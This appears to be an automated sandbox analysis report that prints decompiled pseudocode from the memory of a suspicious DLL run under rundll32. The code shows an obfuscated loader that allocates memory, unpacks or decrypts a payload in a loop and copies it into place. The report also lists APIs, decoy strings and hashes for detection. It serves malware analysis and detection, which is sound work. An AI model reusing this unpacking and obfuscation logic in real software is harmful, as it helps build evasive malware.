							_t11 = _t66 + 0x6ddb5137; // 0x6ddb5137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6DDB1D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6ddb41cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000);
					}
				}
				return _v16;
			}

0x6ddb15aa
0x6ddb15ba
0x6ddb15c1
0x6ddb15c4
0x6ddb15d9
0x6ddb15e0
0x6ddb15e5
0x6ddb15f6
0x6ddb15f9
0x6ddb1601
0x6ddb1604
0x6ddb16ae
0x6ddb160a
0x6ddb160a
0x6ddb160e
0x6ddb1676
0x6ddb1610
0x6ddb1610
0x6ddb1613
0x6ddb1615
0x6ddb161d
0x6ddb1620
0x6ddb1623
0x6ddb162b
0x6ddb1633
0x6ddb1634
0x6ddb1635
0x6ddb163c
0x6ddb163c
0x6ddb1650
0x6ddb1655
0x6ddb165e
0x6ddb1665
0x6ddb1668
0x6ddb166c
0x6ddb1671
0x00000000
0x00000000
0x6ddb1628
0x6ddb1628
0x6ddb1673
0x6ddb1680
0x6ddb1695
0x6ddb1682
0x6ddb168b
0x6ddb1690
0x6ddb16a6
0x6ddb16a6
0x6ddb16b5
0x6ddb16bb

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6DDB15F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6DDB17EC), ref: 6DDB168B
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6DDB16A6

Strings

Mar 26 2021, xrefs: 6DDB162B

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 95c434d5528e025eb33c66db75d4e59f45be6bf45498b648febf2bf9734b5952
Instruction ID: c4038e9d7f54a19bd4bc46b55acc3d3c62690c70a2e1f10ed5b237b4febbc31d
Opcode Fuzzy Hash: 95c434d5528e025eb33c66db75d4e59f45be6bf45498b648febf2bf9734b5952
Instruction Fuzzy Hash: 6A3163B1E4021AEFDF01EF99C881BDEB7B5FF49308F148169E905AB241D771AA058F90

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB1D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6DDB1D32(void* __ecx, intOrPtr _a4) {
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				if(SetThreadAffinityMask(_t13, 1) != 0) {
					SetThreadPriority(_t13, 0xffffffff);
				}
				_t4 = E6DDB17A7(_a4);
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6ddb1d3b
0x6ddb1d4e
0x6ddb1d53
0x6ddb1d53
0x6ddb1d59
0x6ddb1d5e
0x6ddb1d62
0x6ddb1d66
0x6ddb1d66
0x6ddb1d70
0x6ddb1d79

APIs

GetCurrentThread.KERNEL32 ref: 6DDB1D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6DDB1D40
SetThreadPriority.KERNEL32(00000000,000000FF), ref: 6DDB1D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6DDB1D66

Memory Dump Source

Source File: 00000003.00000002.619761789.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000003.00000002.619443639.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.620321006.000000006DDB3000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: fdb11edab5fc84762180ce09d5835d014a35b08d31d456427dc6707f0e32164a
Instruction ID: 5041a5da896cc43a3a67a73757d44f2a06d64d585b79dbac82d958a36a91efd1
Opcode Fuzzy Hash: fdb11edab5fc84762180ce09d5835d014a35b08d31d456427dc6707f0e32164a
Instruction Fuzzy Hash: 18E06DB1759311ABA7023B294C88E6B6B6CDF923397120225F625922D0DB64980A95A5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6224 Parent PID: 2964 rundll32.exeCOMMON

Executed Functions

Function 6DDD1285, Relevance: 39.1, APIs: 3, Strings: 19, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDD1285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6DDF00AC(0x6de37e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6de95a90; // 0x9b00ec0d
				_t127 =  *0x6de959d0; // 0x4b767d5a
				_t261 =  *0x6de959d8; // 0x8bb792d4
				_t380 =  *0x6de959dc; // 0x5
				_t358 =  *0x6de95a00; // 0x897548c8
				_t405 = 0 - _t380;
				_t327 =  *0x6de95a90; // 0x9b00ec0d
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6de95a58 =  *0x6de95a58 + 0xfffffd1c;
					 *0x6de95a00 = _t358;
					asm("adc dword [0x6de95a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6de959d8 = _t261;
					asm("adc esi, eax");
					 *0x6de959dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6de959e6 & 0x0000ffff;
				_t131 = 0x6de959e6;
				 *(_t400 - 0x2c) = 0x6de959e6;
				 *(_t400 - 0x1c) = 0x6de959e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6DDF01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6de959d8 = _t261;
						 *0x6de959dc = _t380;
						 *0x6de95a90 = _t327;
						if(_t327 != ( *0x6de959f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6de95a44);
				_t135 = 6;
				_t411 =  *0x6de95a98 - _t135; // 0x6de3e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6de959d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6de959dc = _t380;
				} else {
					_t412 =  *0x6de95a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6de959d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6de95a00; // 0x897548c8
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6de959e6;
				 *0x6de95a90 = _t139 -  *0x6de95a90 +  *0x6de959d0;
				_t142 =  *0x6de959e6 & 0x0000ffff;
				 *0x6de959d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6de959dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6DDF01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6de959d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6de959dc = _t256;
						 *0x6de95a90 = _t381;
						if(_t381 != ( *0x6de959f0 & 0x0000ffff)) {
							_t381 =  *0x6de95a00; // 0x897548c8
							_t142 =  *0x6de959e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6de95a44);
				 *0x6de959d0 = E6DDD0D32();
				GetTempPathA(0x56d, "C:\Users\alfons\AppData\Local\Temp\");
				_t417 =  *0x6de95a04 - 0x1b47; // 0x0
				if(_t417 == 0) {
					_t318 =  *0x6de95a90; // 0x9b00ec0d
					_t319 = _t318 + ( *0x6de959e6 & 0x0000ffff);
					 *0x6de95a90 = _t319;
					_push(0);
					_t320 =  *0x6de959d8; // 0x8bb792d4
					asm("adc [0x6de959dc], eax");
					 *0x6de959d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6DDD0D32();
				_t402 = _t401 - 0x10;
				 *0x6de959d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6DDD5DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6DDD4197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t149);
				_t270 = 6;
				_t418 =  *0x6de95a02 - _t270; // 0x8975
				if(_t418 == 0) {
					_t151 =  *0x6de959d8; // 0x8bb792d4
					_t153 = _t151 + 0x11dde +  *0x6de959d0;
					__eflags = _t153;
					 *0x6de95a90 = _t153;
				} else {
					_t315 =  *0x6de959d8; // 0x8bb792d4
					 *0x6de959d0 =  *0x6de959d0 +  ~_t315 -  *0x6de95a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6DE1179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6de959d0; // 0x4b767d5a
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x4b767a22
				_t272 = _t25;
				 *0x6de95a90 = _t272;
				_t419 =  *0x6de95a02 - _t155; // 0x8975
				if(_t419 == 0) {
					_t331 =  *0x6de95a00; // 0x897548c8
					_t156 = 0;
					 *0x6de959dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6de959d8 = _t333;
				} else {
					_t333 =  *0x6de959d8; // 0x8bb792d4
					_t156 =  *0x6de959dc; // 0x5
					 *0x6de95a90 = _t272 - _t333 * 0x3d -  *0x6de95a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6DDD4401(_t260, E6DDD4401(_t260, E6DDD1FF2(_t260, E6DDD20D9(_t260, E6DDD4267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6de98150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6de95a00; // 0x897548c8
				_t277 = 0x6de95a0e;
				_t362 =  *0x6de959dc; // 0x5
				_t383 =  *0x6de959d8; // 0x8bb792d4
				do {
					if(_t336 != ( *0x6de959e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x897548cd
						_t245 = _t26 + _t383;
						 *0x6de95a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6de959e2);
				_push("cd Matter m");
				 *0x6de959d8 = _t383;
				 *0x6de959dc = _t362; // executed
				E6DE1179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6de95a98 - _t164; // 0x6de3e664
				if(_t422 != 0) {
					L34:
					 *0x6de959d8 =  *0x6de959d8 - 0x27 +  *0x6de959d0 * 0x3d;
					asm("sbb [0x6de959dc], ecx");
				} else {
					_t423 =  *0x6de95a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6de959d8; // 0x8bb792d4
						 *0x6de959d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6de95a90 =  *0x6de95a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6DDD4197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t169);
				_t281 = 0x27;
				_t171 = E6DDD0EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6de959d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6de959dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6DDD5DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6DDD4197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t174);
				_t176 =  *0x6de959dc; // 0x5
				 *(_t400 - 0x18) =  *0x6de959d8 * 0x36 +  *0x6de95a90;
				_t286 =  *0x6de95a90 * 0x10e1d;
				_t178 =  *0x6de959d8; // 0x8bb792d4
				_t287 = 0x6de95a28;
				 *0x6de959d8 = _t178 * _t286;
				_t340 =  *0x6de95a90; // 0x9b00ec0d
				_t180 =  *0x6de959d0; // 0x4b767d5a
				 *0x6de959dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6de95a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6de959dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6de959d8 = _t184;
						_t427 = _t184 -  *0x6de95a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6de95a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6de95a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6DDD0D32();
				_t364 =  *0x6de95a90; // 0x9b00ec0d
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6de959dc; // 0x5
				_t188 =  *0x6de959d8; // 0x8bb792d4
				_t190 =  *0x6de959f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6de959e6; // 0x3145
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6de959e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6de959e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6DDF01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6de95a90 = _t364;
						if(_t364 != ( *0x6de959f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6de95a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6de95a98 - _t197; // 0x6de3e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6de95a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6de959e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6de95a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6de95a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6de959d8 = _t297;
				 *0x6de959dc = _t346;
				do {
					if(_t393 != ( *0x6de959e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0x89742aef
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6de95a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0x89742b25
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6de959d8 = _t297;
						 *0x6de959dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6de959e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6de959e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6de959e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6de95a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6de959f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6de959e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6de95a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6de959d0 = _t105 + _t347;
				_t213 = E6DDD1029(_t394);
				_t300 =  *0x6de95a90; // 0x9b00ec0d
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6de95a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6de959f2 =  *0x6de959f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6de959d0 = _t371;
				_t446 =  *0x6de95a04 - 0x1b47; // 0x0
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6de959e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6de959d8 = _t349;
					 *0x6de959dc =  *(_t400 - 0x14);
					_t371 =  *0x6de959d0; // 0x4b767d5a
				}
				_t395 = 0x6de95a0e;
				do {
					if(_t300 != ( *0x6de959e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6de959e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6de959d0 = _t371;
				_t450 =  *0x6de95a02 - _t301; // 0x8975
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6de959d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6de95a90 = _t117 + _t349 * 2;
				E6DDCFB4A(_t396, _t451);
				_t350 =  *0x6de95a00; // 0x897548c8
				_t303 = 0x6de95ac8;
				_t372 =  *0x6de959d8; // 0x8bb792d4
				do {
					_t452 = _t396 -  *0x6de95a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6de959dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6de959d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6de95a00 = _t350;
					} else {
						_t453 = 0 -  *0x6de95a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6de95a18);
				_t222 =  *0x6de959dc; // 0x5
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6de95a58 =  *0x6de95a58 - _t396;
					asm("sbb [0x6de95a5c], eax");
					 *0x6de95a00 = _t354;
					asm("sbb ecx, [0x6de959dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6de959d8 = _t372;
					asm("adc ecx, eax");
					 *0x6de959dc = 0;
				}
				_t305 =  *0x6de95a90; // 0x9b00ec0d
				_t306 =  *0x6de959d0; // 0x4b767d5a
				 *0x6de959d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6DDF0075(1);
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDD128C
GetSystemDirectoryA.KERNEL32 ref: 6DDD13C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E,?,00000001,?), ref: 6DDD1468

Strings

cd Island, xrefs: 6DDD1531
DZm, xrefs: 6DDD184B
Ym, xrefs: 6DDD1915
Ym, xrefs: 6DDD1A11
cd Matter m, xrefs: 6DDD1607
Ym, xrefs: 6DDD15FF
(Zm, xrefs: 6DDD170E
DZm, xrefs: 6DDD144C
C:\Windows\system32, xrefs: 6DDD13B2
6623, xrefs: 6DDD16B1
DZm, xrefs: 6DDD136C
E1, xrefs: 6DDD1320, 6DDD1337, 6DDD13E1, 6DDD17B7, 6DDD1801, 6DDD181E, 6DDD191F
6265, xrefs: 6DDD14CB
out drop , xrefs: 6DDD16C8
Molecul, xrefs: 6DDD167E
Had s, xrefs: 6DDD14DF
DZm, xrefs: 6DDD1967
part , xrefs: 6DDD15B5
C:\Users\user\AppData\Local\Temp\, xrefs: 6DDD1459

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Zm$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZm$DZm$DZm$DZm$E1$Had s$Molecul$cd Island$cd Matter m$out drop $part $Ym$Ym$Ym
API String ID: 3607090873-891188877
Opcode ID: 5ebb9fc268858b5886ac1240e99395b6a989460ad7e8762d08975ef75caaf86f
Instruction ID: 94e23ca78b422213e21c6e45ee0ab784bc41335f6660cb7dcd6b8837380bd96d
Opcode Fuzzy Hash: 5ebb9fc268858b5886ac1240e99395b6a989460ad7e8762d08975ef75caaf86f
Instruction Fuzzy Hash: DA3278B1A02612CFDF08DF78C89167977F1FB8A322B25812BE429DF681E7749841CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD78D3, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E6DDD78D3(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;

				E6DDF00AC(0x6de38421, __ebx, __edi, __esi, 0);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6de3aa30;
				_t21 = E6DDEF8B6(__edx, __esi, __eflags);
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6DDD7005(__ebx, _t19, _t21); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6DDD7F47(_t19);
				return E6DDF0075(_t19);
			}

0x6ddd78da
0x6ddd78df
0x6ddd78e1
0x6ddd78e3
0x6ddd78ee
0x6ddd78f3
0x6ddd7906
0x6ddd7906
0x6ddd78f5
0x6ddd78f5
0x6ddd78f9
0x6ddd78fb
0x6ddd7901
0x6ddd7901
0x6ddd790a
0x6ddd790d
0x6ddd7919

APIs

__EH_prolog3.LIBCMT ref: 6DDD78DA
std::locale::_Init.LIBCPMT ref: 6DDD78FB

Part of subcall function 6DDD7005: __EH_prolog3.LIBCMT ref: 6DDD700C
Part of subcall function 6DDD7005: std::_Lockit::_Lockit.LIBCPMT ref: 6DDD7017
Part of subcall function 6DDD7005: std::locale::_Setgloballocale.LIBCPMT ref: 6DDD7032
Part of subcall function 6DDD7005: _Yarn.LIBCPMT ref: 6DDD7048
Part of subcall function 6DDD7005: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD7088

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
